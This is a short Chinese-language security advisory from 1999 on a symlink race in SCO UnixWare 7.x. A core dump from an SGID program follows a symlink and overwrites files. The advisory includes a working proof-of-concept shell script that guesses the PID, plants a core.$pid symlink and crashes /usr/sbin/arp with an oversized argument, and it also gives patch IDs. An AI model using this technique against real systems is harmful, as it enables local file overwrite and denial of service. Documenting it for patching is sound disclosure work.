SCO UnixWare 'coredump' 连接漏洞发布时间:1999-12-03 更新时间:1999-12-03 严重程度:中 威胁程度:本地拒绝服务 错误类型:竞争条件 利用方式:服务器模式 受影响系统 SCO Unixware 7.1.1,7.0.1,7.1,7.0详细描述 在一些版本的SOC UNIXWARE中,如果一用户能强制一个带 SGID的程序去dump内核,他们可以通过猜测他们调用的 SGID进程的PID来发起一个symlink攻击。这样程序在dump core时候不检查一个被连接的文件并且覆盖任意文件。 测试代码 #!/bin/sh #### # Exploit for UnixWare 7.1 - sgid coredumps follow symlinks. # Guessing pid is trivial. Any sgid program which will coredump can be used # -Brock Tellier, btellier@usa.net #### pid=`expr $$ + 4`; ln -s /path/to/sys/group/writable/file core.$pid /usr/sbin/arp `perl -e "print 'A' x 10000"` 解决方案 下载补丁: http://www.sco.com/security Patch IDs: ptf7096l ptf7016l 相关信息 |
